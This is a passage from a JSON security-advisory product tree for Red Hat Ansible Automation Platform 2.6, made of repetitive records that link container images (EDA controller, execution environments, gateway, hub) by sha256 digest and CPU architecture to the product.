"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
